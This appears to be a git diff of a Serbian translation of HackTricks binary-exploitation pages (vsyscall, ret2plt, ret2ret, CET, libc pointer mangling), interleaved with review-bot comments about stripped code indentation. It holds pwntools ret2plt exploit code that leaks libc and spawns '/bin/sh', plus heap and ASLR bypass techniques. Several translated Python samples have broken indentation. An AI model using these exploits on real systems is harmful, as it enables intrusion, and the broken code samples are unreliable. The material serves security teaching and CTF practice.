+(Sledeći primer i kod su [**iz ovog izveštaja**](https://guyinatuxedo.github.io/15-partial_overwrite/hacklu15_stackstuff/index.html#exploitation)) +Na primer, napadač može koristiti adresu `0xffffffffff600800` unutar eksploata. Dok pokušaj da se direktno skoči na `ret` instrukciju može dovesti do nestabilnosti ili rušenja nakon izvršavanja nekoliko gadgeta, skakanje na početak `syscall`-a koji pruža **vsyscall** sekcija može biti uspešno. Pažljivim postavljanjem **ROP** gadgeta koji vodi izvršavanje na ovu **vsyscall** adresu, napadač može postići izvršavanje koda bez potrebe da zaobiđe **ASLR** za ovaj deo eksploata. ``` ef➤ vmmap Start End Offset Perm Path @@ -282,20 +261,19 @@ gef➤ x/8g 0xffffffffff600000 0xffffffffff600020: 0xcccccccccccccccc 0xcccccccccccccccc 0xffffffffff600030: 0xcccccccccccccccc 0xcccccccccccccccc gef➤ x/4i 0xffffffffff600800 - 0xffffffffff600800: mov rax,0x135 - 0xffffffffff600807: syscall - 0xffffffffff600809: ret - 0xffffffffff60080a: int3 +0xffffffffff600800: mov rax,0x135 +0xffffffffff600807: syscall +0xffffffffff600809: ret +0xffffffffff60080a: int3 gef➤ x/4i 0xffffffffff600800 - 0xffffffffff600800: mov rax,0x135 - 0xffffffffff600807: syscall - 0xffffffffff600809: ret - 0xffffffffff60080a: int3 +0xffffffffff600800: mov rax,0x135 +0xffffffffff600807: syscall +0xffffffffff600809: ret +0xffffffffff60080a: int3 ``` - ### vDSO -Note therefore how it might be possible to **bypass ASLR abusing the vdso** if the kernel is compiled with CONFIG_COMPAT_VDSO as the vdso address won't be randomized. For more info check: +Napomena, stoga, kako bi moglo biti moguće **zaobići ASLR koristeći vdso** ako je kernel kompajliran sa CONFIG_COMPAT_VDSO, jer adresa vdso neće biti nasumična. Za više informacija proverite: {{#ref}} ../../rop-return-oriented-programing/ret2vdso.md 
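Review bot: in hunk `@@ -2,107 +2,92 @@` the blank line between the last list item and the next paragraph was removed, so `+Možete proveriti ASLR status sledećom komandom:` now directly follows `+- **2**: Potpuna randomizacija. ...` and Markdown treats it as a lazy continuation of that bullet, rendering the sentence inside item 2 instead of as its own paragraph; restore the blank line (the removed `-` line sat exactly there). The same hunk also strips the four-space indentation from the body of `main()` in the C sample (`+unsigned long long address = 0xffffff1e7e38;` and the following lines); it still compiles, but a translation commit should leave code bytes untouched.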
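Review bot: hunk `@@ -117,70 +102,68 @@` breaks the Python brute-force script: every indented line has lost its leading whitespace (`+while True:` is followed by `+cont += 1`, `+try:` by `+process = subprocess.Popen(...)`, `+except Exception as e:` by `+print(e)`), which is an IndentationError in Python, so the sample no longer runs at all. Indentation is semantic here; the loop body, the `try`/`except` blocks and the `env_vars` dictionary should be restored byte-for-byte from the `-` lines, and fenced blocks should be excluded from the translation pass. Further down in the same hunk, dropping the blank line after `+- **Izazov je dati leak**` turns `+Ako dobijete leak (laki CTF izazovi), ...` into a lazy continuation of that bullet; put the blank line back so the paragraph stands alone as in the English source.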
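Review bot: hunk `@@ -195,20 +178,19 @@` has the same mechanical problem: the arguments of `flat(` lost their indentation (`+'A' * 32,`, `+libc.sym['system'],` now start at column 0). This one is still valid Python because the lines sit inside parentheses, but it is a byte-level change to code that the commit message describes as a translation, so the original indentation should be restored.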
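Review bot: hunk `@@ -282,20 +261,19 @@` changes the gef transcript rather than any prose: the leading spaces before `+0xffffffffff600800: mov rax,0x135` and the three instruction lines after it (in both `x/4i` listings) were stripped, so the block no longer matches what gef printed. Quoted tool output should not be rewritten by a translation commit; restore the original indentation from the `-` lines.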
diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2plt.md b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2plt.md index c0e55129b..d6acb86e5 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2plt.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2plt.md 
@@ -2,40 +2,37 @@ {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne informacije -The goal of this technique would be to **leak an address from a function from the PLT** to be able to bypass ASLR. This is because if, for example, you leak the address of the function `puts` from the libc, you can then **calculate where is the base of `libc`** and calculate offsets to access other functions such as **`system`**. - -This can be done with a `pwntools` payload such as ([**from here**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/plt_and_got)): +Cilj ove tehnike bi bio da **izvuče adresu iz funkcije iz PLT-a** kako bi se moglo zaobići ASLR. To je zato što, na primer, ako izvučete adresu funkcije `puts` iz libc-a, možete zatim **izračunati gde je osnova `libc`** i izračunati ofsete za pristup drugim funkcijama kao što su **`system`**. +Ovo se može uraditi sa `pwntools` payload-om kao što je ([**odavde**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/plt_and_got)): ```python # 32-bit ret2plt payload = flat( - b'A' * padding, - elf.plt['puts'], - elf.symbols['main'], - elf.got['puts'] +b'A' * padding, +elf.plt['puts'], +elf.symbols['main'], +elf.got['puts'] ) # 64-bit payload = flat( - b'A' * padding, - POP_RDI, - elf.got['puts'] - elf.plt['puts'], - elf.symbols['main'] +b'A' * padding, +POP_RDI, +elf.got['puts'] +elf.plt['puts'], +elf.symbols['main'] ) ``` +Napomena kako se **`puts`** (koristeći adresu iz PLT-a) poziva sa adresom `puts` koja se nalazi u GOT-u (Global Offset Table). To je zato što do trenutka kada `puts` ispiše GOT unos `puts`, ovaj **unos će sadržati tačnu adresu `puts` u memoriji**. -Note how **`puts`** (using the address from the PLT) is called with the address of `puts` located in the GOT (Global Offset Table). This is because by the time `puts` prints the GOT entry of puts, this **entry will contain the exact address of `puts` in memory**. 
- -Also note how the address of `main` is used in the exploit so when `puts` ends its execution, the **binary calls `main` again instead of exiting** (so the leaked address will continue to be valid). +Takođe, obratite pažnju kako se adresa `main` koristi u eksploitu, tako da kada `puts` završi svoju izvršavanje, **binarni program ponovo poziva `main` umesto da izlazi** (tako da će otkrivena adresa ostati važeća). > [!CAUTION] -> Note how in order for this to work the **binary cannot be compiled with PIE** or you must have **found a leak to bypass PIE** in order to know the address of the PLT, GOT and main. Otherwise, you need to bypass PIE first. - -You can find a [**full example of this bypass here**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/ret2plt-aslr-bypass). This was the final exploit from that **example**: +> Napomena kako da bi ovo funkcionisalo, **binarni program ne može biti kompajliran sa PIE** ili morate **pronaći leak da zaobiđete PIE** kako biste znali adresu PLT-a, GOT-a i main. U suprotnom, prvo morate zaobići PIE. +Možete pronaći [**potpun primer ovog zaobilaženja ovde**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/ret2plt-aslr-bypass). Ovo je bio konačni exploit iz tog **primera**: ```python from pwn import * @@ -46,10 +43,10 @@ p = process() p.recvline() payload = flat( - 'A' * 32, - elf.plt['puts'], - elf.sym['main'], - elf.got['puts'] +'A' * 32, +elf.plt['puts'], +elf.sym['main'], +elf.got['puts'] ) p.sendline(payload) 
@@ -61,22 +58,21 @@ libc.address = puts_leak - libc.sym['puts'] log.success(f'LIBC base: {hex(libc.address)}') payload = flat( - 'A' * 32, - libc.sym['system'], - libc.sym['exit'], - next(libc.search(b'/bin/sh\x00')) +'A' * 32, +libc.sym['system'], +libc.sym['exit'], +next(libc.search(b'/bin/sh\x00')) ) p.sendline(payload) p.interactive() ``` - -## Other examples & References +## Drugi primeri i reference - [https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html) - - 64 bit, ASLR enabled but no PIE, the first step is to fill an overflow until the byte 0x00 of the canary to then call puts and leak it. With the canary a ROP gadget is created to call puts to leak the address of puts from the GOT and the a ROP gadget to call `system('/bin/sh')` +- 64 bita, ASLR omogućen, ali bez PIE, prvi korak je popuniti prelivanje do bajta 0x00 kanarija, a zatim pozvati puts i otkriti ga. Sa kanarijom se kreira ROP gadget za pozivanje puts da bi se otkrila adresa puts iz GOT-a i zatim ROP gadget za pozivanje `system('/bin/sh')` - [https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html) - - 64 bits, ASLR enabled, no canary, stack overflow in main from a child function. ROP gadget to call puts to leak the address of puts from the GOT and then call an one gadget. +- 64 bita, ASLR omogućen, bez kanarija, prelivanje steka u main iz funkcije deteta. ROP gadget za pozivanje puts da bi se otkrila adresa puts iz GOT-a, a zatim pozvati jedan gadget. {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2ret.md b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2ret.md index 19f39dac3..1b2071aa0 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2ret.md 
+++ b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2ret.md 
@@ -4,27 +4,27 @@ ## Ret2ret -The main **goal** of this technique is to try to **bypass ASLR by abusing an existing pointer in the stack**. +Glavni **cilj** ove tehnike je da pokuša da **obiđe ASLR zloupotrebom postojećeg pokazivača na steku**. -Basically, stack overflows are usually caused by strings, and **strings end with a null byte at the end** in memory. This allows to try to reduce the place pointed by na existing pointer already existing n the stack. So if the stack contained `0xbfffffdd`, this overflow could transform it into `0xbfffff00` (note the last zeroed byte). +U suštini, prelivanja steka obično uzrokuju stringovi, a **stringovi se završavaju nul bajtom na kraju** u memoriji. Ovo omogućava da se pokuša smanjiti mesto na koje pokazuje postojeći pokazivač na steku. Dakle, ako je stek sadržavao `0xbfffffdd`, ovo prelivanje bi moglo da ga transformiše u `0xbfffff00` (obratite pažnju na poslednji nulti bajt). -If that address points to our shellcode in the stack, it's possible to make the flow reach that address by **adding addresses to the `ret` instruction** util this one is reached. +Ako ta adresa pokazuje na naš shellcode na steku, moguće je usmeriti tok ka toj adresi dodavanjem adresa u **`ret` instrukciju** dok se ne dostigne. 
-Therefore the attack would be like this: +Stoga bi napad izgledao ovako: -- NOP sled +- NOP klizaljka - Shellcode -- Overwrite the stack from the EIP with **addresses to `ret`** (RET sled) -- 0x00 added by the string modifying an address from the stack making it point to the NOP sled +- Prepisivanje steka iz EIP-a sa **adresama do `ret`** (RET klizaljka) +- 0x00 dodat od stringa modifikujući adresu sa steka tako da pokazuje na NOP klizaljku -Following [**this link**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2ret.c) you can see an example of a vulnerable binary and [**in this one**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2retexploit.c) the exploit. +Prateći [**ovu vezu**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2ret.c) možete videti primer ranjivog binarnog fajla i [**u ovom**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2retexploit.c) eksploataciju. ## Ret2pop -In case you can find a **perfect pointer in the stack that you don't want to modify** (in `ret2ret` we changes the final lowest byte to `0x00`), you can perform the same `ret2ret` attack, but the **length of the RET sled must be shorted by 1** (so the final `0x00` overwrites the data just before the perfect pointer), and the **last** address of the RET sled must point to **`pop ; ret`**.\ -This way, the **data before the perfect pointer will be removed** from the stack (this is the data affected by the `0x00`) and the **final `ret` will point to the perfect address** in the stack without any change. 
+U slučaju da možete pronaći **savršeni pokazivač na steku koji ne želite da modifikujete** (u `ret2ret` menjamo poslednji najniži bajt u `0x00`), možete izvesti isti `ret2ret` napad, ali **dužina RET klizaljke mora biti skraćena za 1** (tako da konačni `0x00` prepisuje podatke neposredno pre savršenog pokazivača), a **poslednja** adresa RET klizaljke mora pokazivati na **`pop ; ret`**.\ +Na ovaj način, **podatak pre savršenog pokazivača biće uklonjen** sa steka (to su podaci pogođeni `0x00`) i **konačni `ret` će pokazivati na savršenu adresu** na steku bez ikakvih promena. -Following [**this link**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2pop.c) you can see an example of a vulnerable binary and [**in this one** ](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2popexploit.c)the exploit. +Prateći [**ovu vezu**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2pop.c) možete videti primer ranjivog binarnog fajla i [**u ovom**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2popexploit.c) eksploataciju. ## References diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/cet-and-shadow-stack.md b/src/binary-exploitation/common-binary-protections-and-bypasses/cet-and-shadow-stack.md index 22e1edbc2..9a989da64 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/cet-and-shadow-stack.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/cet-and-shadow-stack.md 
@@ -4,22 +4,22 @@ ## Control Flow Enforcement Technology (CET) -**CET** is a security feature implemented at the hardware level, designed to thwart common control-flow hijacking attacks such as **Return-Oriented Programming (ROP)** and **Jump-Oriented Programming (JOP)**. These types of attacks manipulate the execution flow of a program to execute malicious code or to chain together pieces of benign code in a way that performs a malicious action. +**CET** je bezbednosna funkcija implementirana na hardverskom nivou, dizajnirana da spreči uobičajene napade na preuzimanje toka kontrole kao što su **Return-Oriented Programming (ROP)** i **Jump-Oriented Programming (JOP)**. Ove vrste napada manipulišu tokom izvršavanja programa kako bi izvršile zlonamerni kod ili povezale delove benignog koda na način koji izvršava zlonamernu radnju. -CET introduces two main features: **Indirect Branch Tracking (IBT)** and **Shadow Stack**. +CET uvodi dve glavne funkcije: **Indirect Branch Tracking (IBT)** i **Shadow Stack**. -- **IBT** ensures that indirect jumps and calls are made to valid targets, which are marked explicitly as legal destinations for indirect branches. This is achieved through the use of a new instruction set that marks valid targets, thus preventing attackers from diverting the control flow to arbitrary locations. -- **Shadow Stack** is a mechanism that provides integrity for return addresses. It keeps a secured, hidden copy of return addresses separate from the regular call stack. When a function returns, the return address is validated against the shadow stack, preventing attackers from overwriting return addresses on the stack to hijack the control flow. +- **IBT** osigurava da se indirektni skokovi i pozivi vrše na validne ciljeve, koji su eksplicitno označeni kao legalne destinacije za indirektne grane. To se postiže korišćenjem novog skupa instrukcija koji označava validne ciljeve, čime se sprečava napadače da preusmere tok kontrole na proizvoljne lokacije. 
+- **Shadow Stack** je mehanizam koji pruža integritet za adrese povratka. Čuva sigurnu, skrivenu kopiju adresa povratka odvojenu od redovnog steka poziva. Kada funkcija vrati, adresa povratka se validira u odnosu na shadow stack, sprečavajući napadače da prepisuju adrese povratka na steku kako bi preuzeli tok kontrole. ## Shadow Stack -The **shadow stack** is a **dedicated stack used solely for storing return addresses**. It works alongside the regular stack but is protected and hidden from normal program execution, making it difficult for attackers to tamper with. The primary goal of the shadow stack is to ensure that any modifications to return addresses on the conventional stack are detected before they can be used, effectively mitigating ROP attacks. +**Shadow stack** je **posvećen stek koji se koristi isključivo za čuvanje adresa povratka**. Radi zajedno sa regularnim stekom, ali je zaštićen i skriven od normalnog izvršavanja programa, što otežava napadačima da ga manipulišu. Primarni cilj shadow stack-a je da osigura da se sve izmene adresa povratka na konvencionalnom steku otkriju pre nego što se mogu koristiti, efikasno ublažavajući ROP napade. -## How CET and Shadow Stack Prevent Attacks +## Kako CET i Shadow Stack Sprečavaju Napade -**ROP and JOP attacks** rely on the ability to hijack the control flow of an application by leveraging vulnerabilities that allow them to overwrite pointers or return addresses on the stack. By directing the flow to sequences of existing code gadgets or return-oriented programming gadgets, attackers can execute arbitrary code. +**ROP i JOP napadi** oslanjaju se na sposobnost preuzimanja toka kontrole aplikacije koristeći ranjivosti koje im omogućavaju da prepišu pokazivače ili adrese povratka na steku. Usmeravanjem toka ka sekvencama postojećih kodnih gadgeta ili gadgeta orijentisanih na povratak, napadači mogu izvršiti proizvoljan kod. 
-- **CET's IBT** feature makes these attacks significantly harder by ensuring that indirect branches can only jump to addresses that have been explicitly marked as valid targets. This makes it impossible for attackers to execute arbitrary gadgets spread across the binary. -- The **shadow stack**, on the other hand, ensures that even if an attacker can overwrite a return address on the normal stack, the **discrepancy will be detected** when comparing the corrupted address with the secure copy stored in the shadow stack upon returning from a function. If the addresses don't match, the program can terminate or take other security measures, preventing the attack from succeeding. +- **CET-ova IBT** funkcija čini ove napade značajno težim osiguravajući da indirektne grane mogu skakati samo na adrese koje su eksplicitno označene kao validni ciljevi. To čini nemogućim za napadače da izvrše proizvoljne gadgete raspoređene po binarnom kodu. +- **Shadow stack**, s druge strane, osigurava da čak i ako napadač može da prepiše adresu povratka na normalnom steku, **razlika će biti otkrivena** prilikom poređenja oštećene adrese sa sigurnom kopijom pohranjenom u shadow stack-u prilikom vraćanja iz funkcije. Ako se adrese ne poklapaju, program može da se završi ili preduzme druge bezbednosne mere, sprečavajući uspeh napada. {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/libc-protections.md b/src/binary-exploitation/common-binary-protections-and-bypasses/libc-protections.md index cacfd7f2f..dc7d72c40 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/libc-protections.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/libc-protections.md 
@@ -1,82 +1,82 @@ -# Libc Protections +# Libc zaštite {{#include ../../banners/hacktricks-training.md}} -## Chunk Alignment Enforcement +## Sprovođenje poravnanja delova -**Malloc** allocates memory in **8-byte (32-bit) or 16-byte (64-bit) groupings**. This means the end of chunks in 32-bit systems should align with **0x8**, and in 64-bit systems with **0x0**. The security feature checks that each chunk **aligns correctly** at these specific locations before using a pointer from a bin. +**Malloc** alocira memoriju u **8-bajtnih (32-bitnih) ili 16-bajtnih (64-bitnih) grupama**. To znači da se kraj delova u 32-bitnim sistemima treba poravnati sa **0x8**, a u 64-bitnim sistemima sa **0x0**. Bezbednosna funkcija proverava da li se svaki deo **ispravno poravnava** na ovim specifičnim mestima pre nego što se koristi pokazivač iz kontejnera. -### Security Benefits +### Bezbednosne prednosti -The enforcement of chunk alignment in 64-bit systems significantly enhances Malloc's security by **limiting the placement of fake chunks to only 1 out of every 16 addresses**. This complicates exploitation efforts, especially in scenarios where the user has limited control over input values, making attacks more complex and harder to execute successfully. +Sprovođenje poravnanja delova u 64-bitnim sistemima značajno poboljšava bezbednost Malloc-a tako što **ograničava postavljanje lažnih delova na samo 1 od svake 16 adresa**. To otežava napade, posebno u scenarijima gde korisnik ima ograničenu kontrolu nad ulaznim vrednostima, čineći napade složenijim i težim za uspešnu realizaciju. -- **Fastbin Attack on \_\_malloc_hook** +- **Fastbin napad na \_\_malloc_hook** -The new alignment rules in Malloc also thwart a classic attack involving the `__malloc_hook`. Previously, attackers could manipulate chunk sizes to **overwrite this function pointer** and gain **code execution**. 
Now, the strict alignment requirement ensures that such manipulations are no longer viable, closing a common exploitation route and enhancing overall security. +Nova pravila poravnanja u Malloc-u takođe sprečavaju klasičan napad koji uključuje `__malloc_hook`. Prethodno su napadači mogli manipulisati veličinama delova da **prepišu ovu funkciju pokazivača** i dobiju **izvršenje koda**. Sada, strogi zahtevi za poravnanjem osiguravaju da takve manipulacije više nisu moguće, zatvarajući uobičajenu rutu eksploatacije i poboljšavajući ukupnu bezbednost. -## Pointer Mangling on fastbins and tcache +## Manipulacija pokazivačima na fastbins i tcache -**Pointer Mangling** is a security enhancement used to protect **fastbin and tcache Fd pointers** in memory management operations. This technique helps prevent certain types of memory exploit tactics, specifically those that do not require leaked memory information or that manipulate memory locations directly relative to known positions (relative **overwrites**). +**Manipulacija pokazivačima** je bezbednosno poboljšanje koje se koristi za zaštitu **fastbin i tcache Fd pokazivača** u operacijama upravljanja memorijom. Ova tehnika pomaže u sprečavanju određenih vrsta taktika eksploatacije memorije, posebno onih koje ne zahtevaju informacije o propuštenoj memoriji ili koje direktno manipulišu memorijskim lokacijama u odnosu na poznate pozicije (relativni **prepisivanja**). -The core of this technique is an obfuscation formula: +Osnova ove tehnike je formula obfuscacije: **`New_Ptr = (L >> 12) XOR P`** -- **L** is the **Storage Location** of the pointer. -- **P** is the actual **fastbin/tcache Fd Pointer**. +- **L** je **lokacija skladištenja** pokazivača. +- **P** je stvarni **fastbin/tcache Fd pokazivač**. -The reason for the bitwise shift of the storage location (L) by 12 bits to the right before the XOR operation is critical. 
This manipulation addresses a vulnerability inherent in the deterministic nature of the least significant 12 bits of memory addresses, which are typically predictable due to system architecture constraints. By shifting the bits, the predictable portion is moved out of the equation, enhancing the randomness of the new, mangled pointer and thereby safeguarding against exploits that rely on the predictability of these bits. +Razlog za pomeranje lokacije skladištenja (L) za 12 bita udesno pre XOR operacije je ključan. Ova manipulacija se bavi ranjivošću inherentnom determinističkoj prirodi najmanje značajnih 12 bita memorijskih adresa, koje su obično predvidljive zbog ograničenja arhitekture sistema. Pomeraanjem bitova, predvidljivi deo se izbacuje iz jednačine, povećavajući nasumičnost novog, izmenjenog pokazivača i time štiteći od eksploatacija koje se oslanjaju na predvidljivost ovih bitova. -This mangled pointer leverages the existing randomness provided by **Address Space Layout Randomization (ASLR)**, which randomizes addresses used by programs to make it difficult for attackers to predict the memory layout of a process. +Ovaj izmenjeni pokazivač koristi postojeću nasumičnost koju pruža **Randomizacija rasporeda adresnog prostora (ASLR)**, koja randomizuje adrese koje koriste programi kako bi otežala napadačima da predviđaju raspored memorije procesa. -**Demangling** the pointer to retrieve the original address involves using the same XOR operation. Here, the mangled pointer is treated as P in the formula, and when XORed with the unchanged storage location (L), it results in the original pointer being revealed. This symmetry in mangling and demangling ensures that the system can efficiently encode and decode pointers without significant overhead, while substantially increasing security against attacks that manipulate memory pointers. +**Demangling** pokazivača za vraćanje originalne adrese uključuje korišćenje iste XOR operacije. 
Ovde se izmenjeni pokazivač tretira kao P u formuli, a kada se XOR-uje sa nepromenjenom lokacijom skladištenja (L), rezultira otkrivanjem originalnog pokazivača. Ova simetrija u manipulaciji i demanipulaciji osigurava da sistem može efikasno kodirati i dekodirati pokazivače bez značajnog preopterećenja, dok značajno povećava bezbednost protiv napada koji manipulišu pokazivačima memorije. -### Security Benefits +### Bezbednosne prednosti -Pointer mangling aims to **prevent partial and full pointer overwrites in heap** management, a significant enhancement in security. This feature impacts exploit techniques in several ways: +Manipulacija pokazivačima ima za cilj da **spreči delimična i potpuna prepisivanja pokazivača u heap-u**, što je značajno poboljšanje u bezbednosti. Ova funkcija utiče na tehnike eksploatacije na nekoliko načina: -1. **Prevention of Bye Byte Relative Overwrites**: Previously, attackers could change part of a pointer to **redirect heap chunks to different locations without knowing exact addresses**, a technique evident in the leakless **House of Roman** exploit. With pointer mangling, such relative overwrites **without a heap leak now require brute forcing**, drastically reducing their likelihood of success. -2. **Increased Difficulty of Tcache Bin/Fastbin Attacks**: Common attacks that overwrite function pointers (like `__malloc_hook`) by manipulating fastbin or tcache entries are hindered. For example, an attack might involve leaking a LibC address, freeing a chunk into the tcache bin, and then overwriting the Fd pointer to redirect it to `__malloc_hook` for arbitrary code execution. With pointer mangling, these pointers must be correctly mangled, **necessitating a heap leak for accurate manipulation**, thereby elevating the exploitation barrier. -3. 
**Requirement for Heap Leaks in Non-Heap Locations**: Creating a fake chunk in non-heap areas (like the stack, .bss section, or PLT/GOT) now also **requires a heap leak** due to the need for pointer mangling. This extends the complexity of exploiting these areas, similar to the requirement for manipulating LibC addresses. -4. **Leaking Heap Addresses Becomes More Challenging**: Pointer mangling restricts the usefulness of Fd pointers in fastbin and tcache bins as sources for heap address leaks. However, pointers in unsorted, small, and large bins remain unmangled, thus still usable for leaking addresses. This shift pushes attackers to explore these bins for exploitable information, though some techniques may still allow for demangling pointers before a leak, albeit with constraints. +1. **Sprečavanje relativnih prepisivanja po bajtovima**: Prethodno su napadači mogli promeniti deo pokazivača da **preusmere delove heap-a na različite lokacije bez poznavanja tačnih adresa**, tehnika koja je očigledna u eksploataciji bez propuštanja **House of Roman**. Sa manipulacijom pokazivačima, takva relativna prepisivanja **bez propuštanja heap-a sada zahtevaju brute forcing**, drastično smanjujući verovatnoću uspeha. +2. **Povećana težina napada na Tcache Bin/Fastbin**: Uobičajeni napadi koji prepisuju funkcijske pokazivače (poput `__malloc_hook`) manipulacijom fastbin ili tcache unosa su otežani. Na primer, napad može uključivati propuštanje LibC adrese, oslobađanje dela u tcache bin, a zatim prepisivanje Fd pokazivača da ga preusmeri na `__malloc_hook` za proizvoljno izvršenje koda. Sa manipulacijom pokazivačima, ovi pokazivači moraju biti ispravno izmenjeni, **što zahteva propuštanje heap-a za tačnu manipulaciju**, čime se povećava barijera za eksploataciju. +3. 
**Zahtev za propuštanjem heap-a u ne-heap lokacijama**: Kreiranje lažnog dela u ne-heap oblastima (poput steka, .bss sekcije ili PLT/GOT) sada takođe **zahteva propuštanje heap-a** zbog potrebe za manipulacijom pokazivačima. Ovo povećava složenost eksploatacije ovih oblasti, slično zahtevu za manipulaciju LibC adresama. +4. **Propuštanje adresa heap-a postaje teže**: Manipulacija pokazivačima ograničava korisnost Fd pokazivača u fastbin i tcache binovima kao izvora za propuštanje adresa heap-a. Međutim, pokazivači u nesortiranim, malim i velikim binovima ostaju neizmenjeni, pa su i dalje upotrebljivi za propuštanje adresa. Ova promena podstiče napadače da istražuju ove binove za eksploatabilne informacije, iako neke tehnike mogu i dalje omogućiti demanipulaciju pokazivača pre propuštanja, iako sa ograničenjima. -### **Demangling Pointers with a Heap Leak** +### **Demanipulacija pokazivača sa propuštanjem heap-a** > [!CAUTION] -> For a better explanation of the process [**check the original post from here**](https://maxwelldulin.com/BlogPost?post=5445977088). +> Za bolje objašnjenje procesa [**proverite originalni post ovde**](https://maxwelldulin.com/BlogPost?post=5445977088). -### Algorithm Overview +### Pregled algoritma -The formula used for mangling and demangling pointers is: +Formula koja se koristi za manipulaciju i demanipulaciju pokazivača je: **`New_Ptr = (L >> 12) XOR P`** -Where **L** is the storage location and **P** is the Fd pointer. When **L** is shifted right by 12 bits, it exposes the most significant bits of **P**, due to the nature of **XOR**, which outputs 0 when bits are XORed with themselves. +Gde je **L** lokacija skladištenja, a **P** Fd pokazivač. Kada se **L** pomeri udesno za 12 bita, otkriva najznačajnije bitove **P**, zbog prirode **XOR**, koja daje 0 kada se bitovi XOR-uju sami sa sobom. -**Key Steps in the Algorithm:** +**Ključni koraci u algoritmu:** -1. 
**Initial Leak of the Most Significant Bits**: By XORing the shifted **L** with **P**, you effectively get the top 12 bits of **P** because the shifted portion of **L** will be zero, leaving **P's** corresponding bits unchanged. -2. **Recovery of Pointer Bits**: Since XOR is reversible, knowing the result and one of the operands allows you to compute the other operand. This property is used to deduce the entire set of bits for **P** by successively XORing known sets of bits with parts of the mangled pointer. -3. **Iterative Demangling**: The process is repeated, each time using the newly discovered bits of **P** from the previous step to decode the next segment of the mangled pointer, until all bits are recovered. -4. **Handling Deterministic Bits**: The final 12 bits of **L** are lost due to the shift, but they are deterministic and can be reconstructed post-process. +1. **Početno propuštanje najznačajnijih bitova**: XOR-ovanjem pomerene **L** sa **P**, efikasno dobijate gornjih 12 bitova **P** jer će pomerena deo **L** biti nula, ostavljajući odgovarajuće bitove **P** nepromenjenim. +2. **Obnova bitova pokazivača**: Pošto je XOR reverzibilan, poznavanje rezultata i jednog od operanada omogućava vam da izračunate drugi operand. Ova osobina se koristi za dedukciju celog skupa bitova za **P** sukcesivnim XOR-ovanjem poznatih skupova bitova sa delovima izmenjenog pokazivača. +3. **Iterativna demanipulacija**: Proces se ponavlja, svaki put koristeći novo otkrivene bitove **P** iz prethodnog koraka za dekodiranje sledećeg segmenta izmenjenog pokazivača, sve dok se svi bitovi ne obnove. +4. **Rukovanje determinističkim bitovima**: Poslednjih 12 bitova **L** se gubi zbog pomeranja, ali su deterministički i mogu se rekonstruisati nakon procesa. 
-You can find an implementation of this algorithm here: [https://github.com/mdulin2/mangle](https://github.com/mdulin2/mangle) +Možete pronaći implementaciju ovog algoritma ovde: [https://github.com/mdulin2/mangle](https://github.com/mdulin2/mangle) -## Pointer Guard +## Zaštita pokazivača -Pointer guard is an exploit mitigation technique used in glibc to protect stored function pointers, particularly those registered by library calls such as `atexit()`. This protection involves scrambling the pointers by XORing them with a secret stored in the thread data (`fs:0x30`) and applying a bitwise rotation. This mechanism aims to prevent attackers from hijacking control flow by overwriting function pointers. +Zaštita pokazivača je tehnika mitigacije eksploatacije koja se koristi u glibc-u za zaštitu skladištenih funkcijskih pokazivača, posebno onih registrovanih pozivima biblioteka kao što je `atexit()`. Ova zaštita uključuje mešanje pokazivača XOR-ovanjem sa tajnom koja se čuva u podacima niti (`fs:0x30`) i primenom bitovne rotacije. Ovaj mehanizam ima za cilj da spreči napadače da preuzmu kontrolu nad tokom izvršenja prepisivanjem funkcijskih pokazivača. -### **Bypassing Pointer Guard with a leak** +### **Obilaženje zaštite pokazivača sa propuštanjem** -1. **Understanding Pointer Guard Operations:** The scrambling (mangling) of pointers is done using the `PTR_MANGLE` macro which XORs the pointer with a 64-bit secret and then performs a left rotation of 0x11 bits. The reverse operation for recovering the original pointer is handled by `PTR_DEMANGLE`. -2. **Attack Strategy:** The attack is based on a known-plaintext approach, where the attacker needs to know both the original and the mangled versions of a pointer to deduce the secret used for mangling. -3. 
